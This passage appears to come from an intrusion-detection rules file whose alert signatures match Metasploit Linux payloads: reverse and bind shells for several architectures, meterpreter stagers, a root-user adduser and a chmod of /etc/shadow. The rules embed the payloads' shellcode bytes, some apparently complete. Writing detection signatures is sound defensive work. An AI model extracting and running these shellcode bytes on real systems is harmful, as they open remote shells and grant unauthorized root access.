90 c5 75 8e 31 57 3a a1 eb f4 1a 11 02 ab 58 39 c5 0e 8d b6 64 63 7f dc 9c 20 c0 32 c3 48 e8 1a d7 8b 1d 91 76 7a 05 7a ac 8c c4 75 0a c2 25 81 77 7f 9f d8 85 77 be 8e 29 bd 2b 41 4e 0c da 14 d8 38 1d 6b d6 12 d5 b2 e6 29 1c 17 e7 6e da 02 07 c9 c1 f1 e4 76 2a 3e 10 2e 2a 10 24 1b 4e 31 4a c4 1d 5a 9c 52 72 ca ca 08 84 e1 d2 5e fb 3e a3 0b a8 23 65 e5 cb fc aa 72 67 da d4 c9 98 0e ae 01 fc 27 31 bd d3 e0 c0 1d 5f cd bb 20 17 73 f6 9d 6a af 26 eb 91 1a b0 3a b7 16 e5 3b 80 cc 91 f3 ed 78 a5 b6 d8 4e 58 13 5f c1 b3 f2 30 30 01 c2 85 df 51 85 81 5d 14 a5 4b c9 b4 4a b9 34 3f dd f4 7e 7b 40 62 65 b1 12 d8 b0 8c cd e3 b2 9e c5 64 36 1a 37 59 02 3b e9 e5 48 97 5c 96 55 81 92 cb 62 b0 20 d0 9c 5f 17 e5 dc 73 d2 62 c8 3a 54 3f 99 e8 78 9d b5 f8 a4 ec 1a 8c 44 c2 2e d6 ec 1b 90 e5 b7 b2 96 87 bf 56 f4 25 12 3b b3 ea b0 de 31 9d 5e ba ba 05 52 84 a6 42 58 26 35 9b df bd 1c 2c f8 d0 54 52 74 0d 26 b6 e7 48 4f 9f fa d3 81 c5 3f a9 ef |"; content:"| 68 4a 52 f9 |"; content:"| 8c 4e b9 dc c7 20 aa 9e 24 47 31 81 bc 7b 32 1f 67 16 92 f4 fe 78 da 24 de 42 6f 5f 9a 2e 14 cf 58 19 43 e9 b3 5b 4b b7 50 02 cc 79 dc ad 6f eb d3 12 e9 49 a9 3d 17 37 eb 73 41 60 5d 74 eb 68 8e 69 08 69 eb 6d ef ec 35 7a ad 67 51 96 78 43 b7 46 8b d8 40 85 76 a0 e1 5d aa 06 0f 65 9b 1e ca df f5 e6 94 eb 62 4c f3 ea ff 71 7f 4e 22 29 c6 93 31 bd 9f ef 1f 0e a6 26 56 b9 6f 73 3a 5b 9a cc 08 34 9d e4 4e 32 0d 96 b9 9e 7f 4c e2 93 f3 37 90 ec ee 84 9e dc c2 d7 b0 3b ca 6b a6 4d b2 81 91 d3 64 91 ce 33 48 b3 41 97 36 c7 44 63 eb a5 cd 4d e1 95 63 3f b4 e5 ad da 7c 9a 8d 1d 7a aa 41 4b e7 95 06 f9 7b 0a 88 07 67 42 37 0c 03 80 0c b3 b9 24 a5 af d9 5c 84 5a 3d d5 d8 56 7f 38 db 3f 66 cd 4b fc 53 03 20 7c db fa ad 57 e2 57 6c de e8 f1 09 a3 27 26 8c 46 f3 46 45 f4 75 04 9e a4 f6 29 1a 4d a3 9e de db e0 aa 1c 02 f7 01 6b 83 07 9e 86 ef 82 83 97 9d 06 b8 69 0b 38 c3 23 20 46 86 40 6a 1e 04 cf 11 28 f5 c9 c3 50 14 39 08 9e 01 70 d3 4c cb 08 28 b4 5a 5c 9d 81 12 6f ad 37 98 81 d2 |"; content:"| 0c 78 7d d3 a8 |"; content:"| c9 80 af b5 da 57 96 81 e9 21 41 15 46 a1 a4 4a 15 32 e0 e7 66 46 95 6f 66 06 66 85 5c aa 6b 14 36 f9 54 df ec 61 28 0f b9 55 77 06 4e eb 1c 81 39 91 2c 55 9e 38 9d e9 9d 61 d3 1b 82 b9 21 51 15 33 70 a6 b5 4b 15 55 d7 10 9c 15 92 aa 55 97 2a 0d c3 d9 16 d9 8a ce 2a df 39 aa 94 81 79 19 38 97 be 03 be f9 19 a8 1c 86 aa 3a 37 2d 30 5b d1 ef be 17 4f a3 15 bf 5b 88 0d 03 c9 5e d3 99 13 42 e2 93 13 85 90 a6 0a e1 b1 d8 7b 7c b5 cc 5e b6 07 35 fc 5d a4 16 65 80 ac 70 5e 67 75 8d 5a 44 22 8d c0 f9 11 55 1e 82 05 21 a5 4a 55 7c ef c9 c0 42 55 c9 c0 a2 61 a8 13 0f c1 05 11 a7 ef c2 61 b8 28 1c 11 7c a1 70 c4 a5 7a 88 57 38 e2 66 73 86 33 b0 38 54 ac 16 67 60 09 59 8c fb 8b a9 9f 0e 4b 87 e1 12 3a 3a 27 e2 54 8b e8 9c c5 90 8f ca 74 4e f5 84 43 25 ce ba 52 7f a9 5a 72 78 0f 2c 72 d6 79 fd 5e af bc 07 ce 51 4b fc a5 0b 48 b3 dd e0 1e 80 99 d9 51 fd 74 58 46 d4 76 79 71 e0 c4 4b bb 4a a9 7d 6a 00 63 aa 38 0a 77 db f6 65 5d a5 41 58 7e 27 44 07 a1 91 dd bf c2 76 7f a3 e5 fe 46 |"; content:"| a5 c2 21 58 19 |"; content:"| 71 0e 42 13 89 bb 4a 95 68 b8 9a 87 cd 34 6c e9 1c 20 8b 78 48 53 b7 ad 69 1b ab d9 ce b2 8a ac 5c 06 2e a3 1d 72 c8 c3 5a 87 69 9b 60 6d b3 17 3b 2d ae 3e db 1b dc 06 f9 63 00 46 ab 7c 1d be b5 59 87 4a 55 be 75 48 df 21 8f 5f ba 07 bc 83 d0 19 92 07 e1 f2 50 d1 00 5c ac 7a 46 a1 6c 04 22 e4 19 bf 34 04 eb 43 ca 00 cc 1e 81 0d 11 1e 5d 61 1b f6 ca 90 c2 dd fb d8 23 1b 43 32 77 9b 42 45 23 a0 e5 7c ef db 4c 3e af f2 45 d9 6f 95 b6 fb 7d b1 21 d0 e9 1c ed ed 22 79 43 c5 ce ba 12 7f 89 5a 4c e6 2e 53 8b e9 8b 16 b6 84 77 95 90 31 5f 1f 81 6e a2 12 57 65 b5 a8 ca 77 15 4b aa 16 0f c1 d6 03 e0 70 88 8e c5 8e a5 d0 4a fd 95 8e 4d b0 86 82 ef 7b f4 2f 50 44 ae a1 bc f0 0c 3c 6b 87 21 ac a5 39 91 fa a6 ca 9c 48 09 16 c9 96 85 62 ab 95 01 56 cd f8 12 a6 79 e1 51 29 e4 aa 51 5d 19 e8 89 d4 b9 1d f7 81 57 15 54 97 d3 4f 61 94 1c 38 f1 1a 87 de 22 3b d2 99 99 9b 58 7c 1f 9e 03 1f ff 18 63 b3 c3 f9 c4 ac 88 7a ff 08 18 91 aa 21 e8 0d b9 46 60 1b f1 4d 71 e0 8d 40 9a 3e cd 0c f4 |"; content:"| 8d c0 76 b2 d1 0e |"; content:"| ef 8f f8 76 0e c1 d5 ce 43 f0 fe 21 f8 00 43 e6 83 21 a9 e6 08 5c c4 62 5c 53 e7 f1 7b 48 28 99 02 54 ce c0 87 2a 2b 51 95 9d 7e 0f 3b f4 da 48 88 e4 fa f0 d8 b6 7b 4e 1c 1b 80 f2 9c 96 1f 21 0d 6b 6c 2d 87 01 ed dc f0 51 82 8a db b7 cb 9d 85 dc 75 8c c7 eb 6d 3c 5e 67 e1 f1 3a 02 d8 20 dc c0 f3 1f b3 e7 6f b0 e6 6f 20 cc 0d c2 8d 3c ff 71 7b fe 46 6b fe 46 0b b4 1e b7 05 5a d5 45 a7 ab 19 9d 42 16 bc 3e 4e 50 23 70 33 db f7 13 19 f8 e4 01 ce 97 e8 40 17 dc 34 c9 5f cf c3 8f b2 59 75 3d 19 d2 41 7d 2b 52 c2 bc 65 37 cc c9 2a 34 08 b7 72 0e f9 94 ad 12 a1 f7 d3 cd 55 47 26 af 7e 26 7f 75 14 24 72 f3 e9 fb 69 f4 d9 fd 96 d3 64 fe 95 25 cb a7 8a b8 70 f6 3e 23 4b 81 d1 49 21 b3 1b 24 df e7 06 c0 c5 80 65 52 b9 83 47 e1 58 f6 e0 02 12 5a a0 7e 1e d1 bd ad 05 5b 29 d5 dc be 1b 54 8e f7 ea 2a 62 45 59 ac 95 0c 7f fb 9d e0 c2 d6 9a dc f9 17 e0 c5 ec f9 87 e9 b4 9b fa 7d 23 70 07 31 de dd 4c 74 ee 6c a9 aa 76 52 3e b9 ab 93 63 a7 5a 58 30 08 77 53 94 30 9d 7b 76 43 03 75 |"; content:"| 5b 42 82 ef 5e c6 df |"; content:"| 7d 9c 80 4e bc e6 bb 3f 3b 38 8d 74 7c c0 b5 07 14 16 80 6e a2 b9 fb 69 62 0f e7 05 eb ba b8 ab 73 e0 c4 a3 59 15 43 82 b3 ce e5 77 f1 81 3d 50 e1 77 09 7b 41 51 c9 df 9f cf c0 de 4e 55 a8 f2 13 92 be 90 81 2f 76 ee 72 51 f0 bd 68 65 30 c1 4e d8 39 35 5e 82 97 6d 35 d0 43 6a 48 34 f7 36 9d 5f 52 e9 0d 96 d3 cd e5 bd 82 db d5 d8 52 e9 0d 65 60 60 e9 9c 7b e1 7a cb a6 d7 ce 11 36 d5 09 95 4e 3f 91 7b b0 85 4c fd 25 0e 8b dc c5 e7 a5 53 7b 89 4f 8b ea f2 0b 0b cb ef 07 d9 2f 08 9b c8 09 7e a1 4e c8 c9 ee a6 81 e8 a7 0b 8b f2 44 80 36 8a bc b1 84 3f 84 d8 c2 f2 fb e8 d3 6d cd b2 2e bb 44 92 ff 28 23 de b7 7a 00 2e 23 7e 0f 91 ae ef ad 24 ee 5f a6 53 75 95 e5 a4 e9 57 48 a0 72 66 64 7d fa 05 d7 5e 28 65 09 79 e2 c1 01 10 2a 5b 2a 49 b6 87 32 b0 8f 68 10 c0 ee 6e e1 f3 fb 56 bb ac 24 4b 38 17 2a c3 fb b3 45 c2 2b f0 93 6c ba 99 07 4e 0b be 8c 41 dc df 3c 02 ce 08 d9 5b 18 02 d7 63 16 dc 04 70 59 eb b9 f2 e2 a7 63 e5 44 bd 35 0f b0 c8 f7 d5 61 f8 da 20 ec cf c0 81 83 |"; content:"| e8 3b 48 a3 83 f0 75 |"; content:"| df 37 06 61 90 3c 7e 10 6e 19 a4 51 c6 fa 5c ee 1b b2 56 6f b5 93 12 fc 17 50 4b 03 04 14 00 00 00 00 00 89 6d b9 3e 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 4d 45 54 41 2d 49 4e 46 2f 50 4b 03 04 14 00 00 00 08 00 89 6d b9 3e 06 f5 c4 12 4a 00 00 00 5b 00 00 00 14 00 00 00 4d 45 54 41 2d 49 4e 46 2f 4d 41 4e 49 46 45 53 54 2e 4d 46 f3 4d cc cb 4c 4b 2d 2e d1 0d 4b 2d 2a ce cc cf b3 52 30 d4 33 e0 e5 f2 4d cc cc d3 75 ce 49 2c 2e b6 52 c8 4d 2d 49 2c 2e c8 c9 cf 2c d1 0b 48 ac cc c9 4f 4c e1 e5 e2 e5 f2 4b cc 4d 45 96 d3 87 ca e9 25 83 74 81 54 00 00 50 4b 03 04 14 00 00 00 08 00 89 6d b9 3e |"; content:"| 1b 00 00 00 1e 00 00 00 0e 00 00 00 6d 65 74 61 73 70 6c 6f 69 74 2e 64 61 74 0b 2e 48 2c cf b3 35 e2 f2 f1 f0 0f 0e b1 |"; content:"| 03 43 2e 9f 00 ff 20 20 8f 0b 00 50 4b 01 02 14 00 14 00 00 00 00 00 89 6d b9 3e 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6d 65 74 61 73 70 6c 6f 69 74 2f 50 4b 01 02 14 00 14 00 00 00 08 00 89 |"; content:"| 6d b9 3e f2 |"; content:"| d4 1c a7 10 00 00 f1 1f 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 29 00 00 00 6d 65 74 61 73 70 6c 6f 69 74 2f 50 61 79 6c 6f 61 64 2e 63 6c 61 73 73 50 4b 01 02 14 00 14 00 00 00 00 00 89 6d b9 3e 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 06 11 00 00 4d 45 54 41 2d 49 4e 46 2f 50 4b 01 02 14 00 14 00 00 00 08 00 89 6d b9 3e 06 f5 c4 12 4a 00 00 00 5b 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 2d 11 00 00 4d 45 54 41 2d 49 4e 46 2f 4d 41 4e 49 46 45 53 54 2e 4d 46 50 4b 01 02 14 00 14 00 00 00 08 00 89 6d b9 3e |"; content:"| 1b 00 00 00 1e 00 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 a9 11 00 00 6d 65 74 61 73 70 6c 6f 69 74 2e 64 61 74 50 4b 05 06 00 00 00 00 05 00 05 00 34 01 00 00 f0 11 00 00 00 00 |"; sid:1000040; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/armle/adduser"; flow:established; content:"| 05 50 45 e0 01 50 8f e2 15 ff 2f e1 78 46 5c 30 ff 21 ff 31 ff 31 ff 31 45 31 dc 22 c8 32 05 27 01 df 80 46 41 46 08 1c 79 46 18 31 c0 46 28 22 04 27 01 df 41 46 08 1c 06 27 01 df 1a 49 08 1c 01 27 01 df 6d 65 74 61 73 70 6c 6f 69 74 3a 41 7a 2f 64 49 73 6a 34 70 34 49 52 63 3a 30 3a 30 3a 3a 2f 3a 2f 62 69 6e 2f 73 68 0a 2f 65 74 63 2f 70 61 73 73 77 64 |"; sid:1000041; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/armle/exec"; flow:established; content:"| 01 30 8f e2 13 ff 2f e1 78 46 0a 30 01 90 01 a9 92 1a 0b 27 01 df |"; content:"| 74 68 69 6e 67 |"; sid:1000042; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/armle/shell_reverse_tcp"; flow:established; content:"| 02 00 a0 e3 01 10 a0 e3 05 20 81 e2 8c 70 a0 e3 8d 70 87 e2 00 00 00 ef 00 60 a0 e1 84 10 8f e2 10 20 a0 e3 8d 70 a0 e3 8e 70 87 e2 00 00 00 ef 06 00 a0 e1 00 10 a0 e3 3f 70 a0 e3 00 00 00 ef 06 00 a0 e1 01 10 a0 e3 3f 70 a0 e3 00 00 00 ef 06 00 a0 e1 02 10 a0 e3 3f 70 a0 e3 00 00 00 ef 48 00 8f e2 04 40 24 e0 10 00 2d e9 0d 20 a0 e1 04 00 2d e9 0d 20 a0 e1 10 00 2d e9 48 10 9f e5 02 00 2d e9 00 20 2d e9 0d 10 a0 e1 04 00 2d e9 0d 20 a0 e1 0b 70 a0 e3 00 00 00 ef 00 00 a0 e3 01 70 a0 e3 00 00 00 ef 02 00 00 |"; content:"| 2f 73 79 73 74 65 6d 2f 62 69 6e 2f 73 68 00 00 2d 43 00 00 |"; sid:1000043; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/mipsbe/shell_reverse_tcp"; flow:established; content:"| 24 09 ff ef 05 10 ff ff 28 08 82 82 01 20 48 27 01 3f c8 21 af b9 85 48 23 b9 85 48 3c 1c 00 00 27 9c 00 00 03 99 e0 21 27 bd ff d0 af bc 00 00 af bc 00 28 8f 84 00 00 00 00 00 00 24 84 00 f8 00 00 00 00 8c 85 00 00 8c 87 00 04 3c 08 c0 a8 35 06 01 09 27 b9 00 18 24 03 00 02 24 02 00 |"; content:"| af a5 00 18 af a6 00 0c af a7 00 1c a7 a3 00 08 a7 a2 00 0a af b9 00 20 af a0 00 24 24 04 00 02 24 05 00 02 00 00 30 21 24 02 10 57 00 00 00 0c 24 04 ff ff 10 44 00 1a 00 40 18 21 00 60 20 21 24 06 00 10 27 a5 00 08 24 02 10 4a 00 00 00 0c 14 40 00 0e 00 00 28 21 24 02 0f df 00 00 00 0c 24 05 00 01 24 02 0f df 00 00 00 0c 24 05 00 02 24 02 0f df 00 00 00 0c 03 20 20 21 27 a5 00 20 00 00 30 21 24 02 0f ab 00 00 00 0c 00 00 20 21 24 02 0f a1 00 00 00 0c 03 e0 00 08 27 bd 00 30 24 04 00 01 24 02 0f a1 00 00 00 0c 10 00 ff e4 00 60 20 21 2f 62 69 6e 2f 73 68 00 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |"; content:"| 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |"; content:"| 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |"; sid:1000044; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/mipsle/shell_reverse_tcp"; flow:established; content:"| ef ff 09 24 ff ff 10 05 82 82 08 28 27 48 20 01 21 c8 3f 01 48 85 b9 af 48 85 b9 23 00 00 1c 3c 00 00 9c 27 21 e0 99 03 00 00 89 8f d8 ff bd 27 e8 00 2a 25 04 00 47 8d e8 00 28 8d 01 09 04 3c c0 a8 83 34 18 00 b9 27 02 00 06 24 00 |"; content:"| 05 24 08 00 a6 a7 0a 00 a5 a7 18 00 a8 af 1c 00 a7 af 0c 00 a3 af 20 00 b9 af 24 00 a0 af 02 00 04 24 02 00 05 24 21 30 00 00 57 10 02 24 0c 00 00 00 21 18 40 00 ff ff 02 24 1a 00 62 10 01 00 04 24 21 20 60 00 08 00 a5 27 10 00 06 24 4a 10 02 24 0c 00 00 00 0e 00 40 14 21 28 00 00 df 0f 02 24 0c 00 00 00 01 00 05 24 df 0f 02 24 0c 00 00 00 02 00 05 24 df 0f 02 24 0c 00 00 00 21 30 00 00 21 20 20 03 20 00 a5 27 ab 0f 02 24 0c 00 00 00 21 20 00 00 a1 0f 02 24 0c 00 00 00 08 00 e0 03 28 00 bd 27 a1 0f 02 24 0c 00 00 00 e5 ff 00 10 21 20 60 00 2f 62 69 6e 2f 73 68 00 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |"; content:"| 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |"; content:"| 30 30 30 30 30 30 30 30 30 30 30 30 |"; sid:1000045; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/ppc/shell_bind_tcp"; flow:established; content:"| 7f ff fa 78 3b a0 01 ff 3b 9d fe 02 3b 7d fe 03 97 e1 ff fc 97 81 ff fc 97 61 ff fc 7c 24 0b 78 38 7d fe 02 38 1d fe 67 44 ff ff 02 7c 7a 1b 78 3b 3d fe 11 3e e0 ff 02 62 f7 00 |"; content:"| 97 e1 ff fc 96 e1 ff fc 7c 36 0b 78 97 21 ff fc 96 c1 ff fc 97 41 ff fc 7c 24 0b 78 38 7d fe 03 38 1d fe 67 44 ff ff 02 97 e1 ff fc 97 e1 ff fc 97 41 ff fc 7c 24 0b 78 38 7d fe 05 38 1d fe 67 44 ff ff 02 7c 24 0b 78 38 7d fe 06 38 1d fe 67 44 ff ff 02 7c 75 1b 78 7f 64 db 78 7e a3 ab 78 38 1d fe 40 44 ff ff 02 37 7b ff ff 40 80 ff ec 7c a5 2a 79 40 82 ff fd 7f c8 02 a6 3b de 01 ff 38 7e fe 25 98 be fe 2c 94 a1 ff fc 94 61 ff fc 7c 24 0b 78 38 1d fe 0c 44 ff ff 02 2f 62 69 6e 2f 73 68 |"; sid:1000046; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/ppc/shell_find_port"; flow:established; content:"| 7f ff fa 78 3b a0 01 ff 97 e1 ff fc 7c 3c 0b 78 3b 7d fe 11 97 61 ff fc 7c 3a 0b 78 97 41 ff fc 97 81 ff fc 97 e1 ff fc 3b ff 01 ff 3b ff fe 02 38 21 01 ff 38 21 fe 05 97 e1 ff fc 7c 24 0b 78 38 7d fe 08 38 1d fe 67 44 ff ff 02 3b 3c 01 ff a3 39 fe 03 28 19 |"; content:"| 40 82 ff d0 3b 1d fe 03 7f 04 c3 78 7f e3 fb 78 38 1d fe 40 44 ff ff 02 37 18 ff ff 40 80 ff ec 7c a5 2a 79 40 82 ff fd 7f c8 02 a6 3b de 01 ff 38 7e fe 25 98 be fe 2c 94 a1 ff fc 94 61 ff fc 7c 24 0b 78 38 1d fe 0c 44 ff ff 02 2f 62 69 6e 2f 73 68 |"; sid:1000047; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/ppc/shell_reverse_tcp"; flow:established; content:"| 7f ff fa 78 3b a0 01 ff 3b 9d fe 02 3b 7d fe 03 97 e1 ff fc 97 81 ff fc 97 61 ff fc 7c 24 0b 78 38 7d fe 02 38 1d fe 67 44 ff ff 02 7c 7a 1b 78 3b 3d fe 11 3e e0 |"; content:"| 96 e1 ff fc 96 c1 ff fc 93 61 ff fe 7c 35 0b 78 97 21 ff fc 96 a1 ff fc 97 41 ff fc 7c 24 0b 78 38 7d fe 04 38 1d fe 67 44 ff ff 02 7f 64 db 78 7f 43 d3 78 38 1d fe 40 44 ff ff 02 37 7b ff ff 40 80 ff ec 7c a5 2a 79 40 82 ff fd 7f c8 02 a6 3b de 01 ff 38 7e fe 25 98 be fe 2c 94 a1 ff fc 94 61 ff fc 7c 24 0b 78 38 1d fe 0c 44 ff ff 02 2f 62 69 6e 2f 73 68 |"; sid:1000048; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/ppc64/shell_bind_tcp"; flow:established; content:"| 7f ff fa 78 3b a0 01 ff 3b 9d fe 02 3b 7d fe 03 fb e1 ff f9 fb 81 ff f9 fb 61 ff f9 7c 24 0b 78 38 7d fe 02 38 1d fe 67 44 ff ff 02 7c 7a 1b 78 3b 3d fe 11 3e e0 ff 02 62 f7 00 |"; content:"| 97 e1 ff fc 96 e1 ff fc 7c 36 0b 78 fb 21 ff f9 fa c1 ff f9 fb 41 ff f9 7c 24 0b 78 38 7d fe 03 38 1d fe 67 44 ff ff 02 fb e1 ff f9 fb e1 ff f9 fb 41 ff f9 7c 24 0b 78 38 7d fe 05 38 1d fe 67 44 ff ff 02 7c 24 0b 78 38 7d fe 06 38 1d fe 67 44 ff ff 02 7c 75 1b 78 7f 64 db 78 7e a3 ab 78 38 1d fe 40 44 ff ff 02 37 7b ff ff 40 80 ff ec 7c a5 2a 79 40 82 ff fd 7f c8 02 a6 3b de 01 ff 38 7e fe 25 98 be fe 2c f8 a1 ff f9 f8 61 ff f9 7c 24 0b 78 38 1d fe 0c 44 ff ff 02 2f 62 69 6e 2f 73 68 |"; sid:1000049; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/ppc64/shell_find_port"; flow:established; content:"| 7f ff fa 78 3b a0 01 ff 97 e1 ff fc 7c 3c 0b 78 3b 7d fe 11 97 61 ff fc 7c 3a 0b 78 fb 41 ff f9 fb 81 ff f9 fb e1 ff f9 3b ff 01 ff 3b ff fe 02 38 21 01 ff 38 21 fe 09 fb e1 ff f9 7c 24 0b 78 38 7d fe 08 38 1d fe 67 44 ff ff 02 3b 3c 01 ff a3 39 fe 03 28 19 |"; content:"| 40 82 ff d0 3b 1d fe 03 7f 04 c3 78 7f e3 fb 78 38 1d fe 40 44 ff ff 02 37 18 ff ff 40 80 ff ec 7c a5 2a 79 40 82 ff fd 7f c8 02 a6 3b de 01 ff 38 7e fe 25 98 be fe 2c f8 a1 ff f9 f8 61 ff f9 7c 24 0b 78 38 1d fe 0c 44 ff ff 02 2f 62 69 6e 2f 73 68 |"; sid:1000050; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/ppc64/shell_reverse_tcp"; flow:established; content:"| 7f ff fa 78 3b a0 01 ff 3b 9d fe 02 3b 7d fe 03 fb e1 ff f9 fb 81 ff f9 fb 61 ff f9 7c 24 0b 78 38 7d fe 02 38 1d fe 67 44 ff ff 02 7c 7a 1b 78 3b 3d fe 11 3e e0 |"; content:"| 96 e1 ff fc 96 c1 ff fc 93 61 ff fe 7c 35 0b 78 fb 21 ff f9 fa a1 ff f9 fb 41 ff f9 7c 24 0b 78 38 7d fe 04 38 1d fe 67 44 ff ff 02 7f 64 db 78 7f 43 d3 78 38 1d fe 40 44 ff ff 02 37 7b ff ff 40 80 ff ec 7c a5 2a 79 40 82 ff fd 7f c8 02 a6 3b de 01 ff 38 7e fe 25 98 be fe 2c f8 a1 ff f9 f8 61 ff f9 7c 24 0b 78 38 1d fe 0c 44 ff ff 02 2f 62 69 6e 2f 73 68 |"; sid:1000051; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/x64/exec"; flow:established; content:"| 6a 3b 58 99 48 bb 2f 62 69 6e 2f 73 68 00 53 48 89 e7 68 2d 63 00 00 48 89 e6 52 e8 |"; content:"| 74 68 69 6e 67 |"; content:"| 00 56 57 48 89 e6 0f 05 |"; sid:1000052; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/x64/shell/bind_tcp"; flow:established; content:"| 6a 29 58 99 6a 02 5f 6a 01 5e 0f 05 48 97 52 c7 04 24 02 00 00 |"; content:"| 48 89 e6 6a 10 5a 6a 31 58 0f 05 59 6a 32 58 0f 05 48 96 6a 2b 58 0f 05 50 56 5f 6a 09 58 99 b6 10 48 89 d6 4d 31 c9 6a 22 41 5a b2 07 0f 05 48 96 48 97 5f 0f 05 ff e6 |"; sid:1000053; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/x64/shell/reverse_tcp"; flow:established; content:"| 48 31 ff 6a 09 58 99 b6 10 48 89 d6 4d 31 c9 6a 22 41 5a b2 07 0f 05 56 50 6a 29 58 99 6a 02 5f 6a 01 5e 0f 05 48 97 48 b9 02 00 00 |"; content:"| 51 48 89 e6 6a 10 5a 6a 2a 58 0f 05 59 5e 5a 0f 05 ff e6 |"; sid:1000054; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/x64/shell_bind_tcp"; flow:established; content:"| 6a 29 58 99 6a 02 5f 6a 01 5e 0f 05 48 97 52 c7 04 24 02 00 00 |"; content:"| 48 89 e6 6a 10 5a 6a 31 58 0f 05 6a 32 58 0f 05 48 31 f6 6a 2b 58 0f 05 48 97 6a 03 5e 48 ff ce 6a 21 58 0f 05 75 f6 6a 3b 58 99 48 bb 2f 62 69 6e 2f 73 68 00 53 48 89 e7 52 57 48 89 e6 0f 05 |"; sid:1000055; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/x64/shell_reverse_tcp"; flow:established; content:"| 6a 29 58 99 6a 02 5f 6a 01 5e 0f 05 48 97 48 b9 02 00 00 |"; content:"| 51 48 89 e6 6a 10 5a 6a 2a 58 0f 05 6a 03 5e 48 ff ce 6a 21 58 0f 05 75 f6 6a 3b 58 99 48 bb 2f 62 69 6e 2f 73 68 00 53 48 89 e7 52 57 48 89 e6 0f 05 |"; sid:1000056; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/x86/adduser"; flow:established; content:"| 31 c9 89 cb 6a 46 58 cd 80 6a 05 58 31 c9 51 68 73 73 77 64 68 2f 2f 70 61 68 2f 65 74 63 89 e3 41 b5 04 cd 80 93 e8 28 00 00 00 6d 65 74 61 73 70 6c 6f 69 74 3a 41 7a 2f 64 49 73 6a 34 70 34 49 52 63 3a 30 3a 30 3a 3a 2f 3a 2f 62 69 6e 2f 73 68 0a 59 8b 51 fc 6a 04 58 cd 80 6a 01 58 cd 80 |"; sid:1000057; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/x86/chmod"; flow:established; content:"| 99 6a 0f 58 52 e8 0c 00 00 00 2f 65 74 63 2f 73 68 61 64 6f 77 00 5b 68 b6 01 00 00 59 cd 80 6a 01 58 cd 80 |"; sid:1000058; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/x86/exec"; flow:established; content:"| 6a 0b 58 99 52 66 68 2d 63 89 e7 68 2f 73 68 00 68 2f 62 69 6e 89 e3 52 e8 0c 00 00 00 |"; content:"| 74 68 69 6e 67 |"; content:"| 00 00 00 57 53 89 e1 cd 80 |"; sid:1000059; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/x86/meterpreter/bind_ipv6_tcp"; flow:established; content:"| 31 db 53 43 53 6a 0a 89 e1 6a 66 58 cd 80 96 99 52 52 52 52 52 52 66 68 00 |"; content:"| 66 68 0a 00 89 e1 6a 1c 51 56 89 e1 43 6a 66 58 cd 80 b0 66 b3 04 cd 80 52 52 56 89 e1 43 b0 66 cd 80 93 b6 0c b0 03 cd 80 89 df ff e1 |"; sid:1000060; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/x86/meterpreter/bind_tcp"; flow:established; content:"| 31 db 53 43 53 6a 02 6a 66 58 99 89 e1 cd 80 96 43 52 66 68 00 |"; content:"| 66 53 89 e1 6a 66 58 50 51 56 89 e1 cd 80 b0 66 d1 e3 cd 80 52 52 56 43 89 e1 b0 66 cd 80 93 b6 0c b0 03 cd 80 89 df ff e1 |"; sid:1000061; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/x86/meterpreter/find_tag"; flow:established; content:"| 31 db 53 89 e6 6a 40 b7 0a 53 56 53 89 e1 86 fb 66 ff 01 6a 66 58 cd 80 81 3e |"; content:"| 75 f0 5f fc ad ff e6 |"; sid:1000062; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"linux/x86/meterpreter/reverse_ipv6_tcp"; flow:established; content:"| 31 db 53 43 53 6a 0a 89 e1 6a 66 58 cd 80 96 99 68 00 00 00 00 68 |"; content:"| 68 00 00 5e fe 68 00 00 00 00 68 fe 80 00 00 52 66 68 00 |"; content:"| 66 68 0a 00 89 e1 6a 1c 51 56 89 e1 43 43 6a 66 58 cd 80 89 f3 b6 0c b0 03 cd 80 89 df ff e1 |"; sid:1000063; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any 